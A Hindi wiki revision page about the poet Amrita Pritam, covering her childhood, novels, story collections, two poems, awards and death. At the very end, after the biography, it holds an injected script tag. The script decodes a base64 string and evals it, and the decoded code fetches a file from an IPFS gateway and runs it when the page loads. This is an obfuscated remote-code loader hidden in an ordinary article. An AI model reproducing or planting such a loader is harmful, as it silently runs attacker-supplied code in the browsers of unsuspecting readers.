अमृता प्रीतम: Difference between revisions

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:पद्म श्री (को हटा दिया गया हैं।))
Line 87: Line 87:
[[Category:उपन्यासकार]]
[[Category:उपन्यासकार]]
[[Category:साहित्य कोश]]
[[Category:साहित्य कोश]]
[[Category:पद्म श्री]]
__INDEX__
__INDEX__
__NOTOC__
__NOTOC__

Revision as of 10:58, 25 March 2011

thumb|250px|अमृता प्रीतम

  • अमृता प्रीतम (जन्म- 31 अगस्त, 1919 पंजाब (पाकिस्तान) – मृत्यु- 31 अक्टूबर, 2005 दिल्ली) प्रसिद्ध कवयित्री, उपन्यासकार और निबंधकार थीं जिन्हें 20वीं सदी की पंजाबी भाषा की सर्वश्रेष्ठ कवयित्री माना जाता है।
  • इनकी लोकप्रियता सीमा पार पाकिस्तान में भी बराबर है। इन्होंने पंजाबी जगत में छ: दशकों तक राज किया।
  • अमृता प्रीतम ने कुल मिलाकर लगभग 100 पुस्तकें लिखी हैं जिनमें उनकी चर्चित आत्मकथा 'रसीदी टिकट' भी शामिल है।
  • अमृता प्रीतम उन साहित्यकारों में थीं जिनकी कृतियों का अनेक भाषाओं में अनुवाद हुआ। अपने अंतिम दिनों में अमृता प्रीतम को भारत का दूसरा सबसे बड़ा सम्मान पद्म विभूषण भी प्राप्त हुआ। उन्हें साहित्य अकादमी पुरस्कार से पहले ही अलंकृत किया जा चुका था।

जन्म और बचपन

अमृता प्रीतम का जन्म 1919 में गुजरांवाला (पंजाब- पाकिस्तान) मे हुआ था। बचपन लाहौर में बीता और शिक्षा भी वंही पर हुई। इन्होंने शुरूआत की पंजाबी लेखन से और किशोरावस्था से ही कविता, कहानी और निबंध लिखना शुरू किया। अमृता जी 11 साल की थी तभी इनकी माताजी का इन्तकाल हो गया, इसलिये घर की जिम्मेदारी भी इनके कंधो पर आ गयी। ये उन विरले साहित्यकारों में से है जिनका पहला संकलन 16 साल की उमर में प्रकाशित हुआ। फ़िर आया 1947 का विभाजन का दौर, इन्होने विभाजन का दर्द सहा था, और इसे बहुत करीब से महसूस किया था, इनकी कई कहानियों में आप इस दर्द को स्वयं महसूस कर सकते हैं। विभाजन के समय इनका परिवार दिल्ली मे आ बसा। अब इन्होंने पंजाबी के साथ साथ हिन्दी में भी लिखना शुरू किया। इनका विवाह 16 साल की उम्र में ही एक संपादक से हुआ, ये रिश्ता बचपन में ही मां बाप ने तय कर दिया था। यह वैवाहिक जीवन भी 1960 में, तलाक के साथ टूट गया।[1]

कृतियाँ

1960 में अपने पति से तलाक के बाद, इनकी रचनाओं मे महिला पात्रों की पीड़ा और वैवाहिक जीवन के कटु अनुभवों का अहसास को महसूस किया जा सकता है। विभाजन की पीड़ा को लेकर इनके उपन्यास पिंजर पर एक फ़िल्म भी बनी थी, जो अच्छी खासी चर्चा मे रही। इन्होंने लगभग 100 पुस्तकें लिखीं और इनकी काफ़ी रचनाएं विदेशी भाषाओं मे भी अनुवादित हुई।

कहानी संग्रह

  • सत्रह कहानियाँ
  • सात सौ बीस कदम
  • 10 प्रतिनिधि कहानियाँ
  • चूहे और आदमी में फर्क
  • दो खिड़कियाँ
  • ये कहानियाँ जो कहानियाँ नहीं हैं

उपन्यास

  • कैली कामिनी और अनीता
  • यह कलम यह कागज यह अक्षर
  • ना राधा ना रुक्मणी
  • जलते बुझते लोग
  • जलावतन
  • पिंजर

आत्मकथा

  • अक्षरों के साये
  • रसीदी टिकट

संस्मरण

  • कच्चा आँगन

कुछ कविताएँ

हादसा

बरसों की आरी हंस रही थी
घटनाओं के दांत नुकीले थे
अकस्मात एक पाया टूट गया
आसमान की चौकी पर से
शीशे का सूरज फिसल गया

आंखों में ककड़ छितरा गये
और नजर जख्मी हो गयी
कुछ दिखायी नहीं देता
दुनिया शायद अब भी बसती है[2]

आत्ममिलन

मेरी सेज हाजिर है
पर जूते और कमीज की तरह
तू अपना बदन भी उतार दे
उधर मूढ़े पर रख दे
कोई खास बात नहीं
बस अपने अपने देश का रिवाज है……[2]

सम्मान और पुरस्कार

thumb|250px|अमृता प्रीतम अमृता जी को कई राष्ट्रीय और अंतर्राष्ट्रीय पुरस्कारों से भी नवाजा गया, जिनमें प्रमुख हैं 1956 में साहित्य अकादमी पुरस्कार, 1958 में पंजाब सरकार के भाषा विभाग द्वारा पुरस्कार, 1988 में बल्गारिया वैरोव पुरस्कार; (अन्तर्राष्ट्रीय) और 1982 में भारत के सर्वोच्च साहित्त्यिक पुरस्कार ज्ञानपीठ पुरस्कार। वे पहली महिला थी जिन्हे साहित्य अकादमी अवार्ड मिला और साथ ही साथ वे पहली पंजाबी महिला थी जिन्हें 1969 में पद्मश्री अवार्ड से नवाजा गया।[1]

  • साहित्य अकादमी पुरस्कार (1956)
  • पद्मश्री (1969)
  • डाक्टर आफ़ लिटरेचर (दिल्ली यूनिवर्सिटी- 1973)
  • डाक्टर आफ़ लिटरेचर (जबलपुर यूनिवर्सिटी- 1973)
  • बल्गारिया वैरोव पुरस्कार (बुल्गारिया – 1988)
  • भारतीय ज्ञानपीठ पुरस्कार (1982)
  • डाक्टर आफ़ लिटरेचर (विश्व भारती शांतिनिकेतनी- 1987)
  • फ़्रांस सरकार द्वारा सम्मान (1987)
  • पद्म विभूषण (2004)

निधन

अमृता प्रीतम ने लम्बी बीमारी के बाद 31 अक्टूबर, 2005 को अपने प्राण त्यागे। वे 86 साल की थीं, और दक्षिणी दिल्ली के हौज खास इलाके में रहती थीं। अब वे हमारे बीच नहीं हैं, लेकिन उनकी कवितायें, कहानिया, नज्में और संस्मरण सदैव ही हमारे बीच रहेंगे। अमृता प्रीतम जैसे साहित्याकार रोज रोज पैदा नही होते, उनके जाने से एक युग का अन्त हुआ है। अब वे हमारे बीच नहीं है लेकिन उनका साहित्य हमेशा हम सब के बीच मे जिन्दा रहेगा और हमारा मार्गदर्शन करता रहेगा।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध


टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 1.2 अमृता प्रीतम: एक युग का अंत (हिन्दी) (पी.एच.पी) मेरा पन्ना। अभिगमन तिथि: 25 मार्च, 2011
  2. 2.0 2.1 अमृता प्रीतम की कुछ कवितायें (हिन्दी) (पी.एच.पी) आईना। अभिगमन तिथि: 25 मार्च, 2011

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>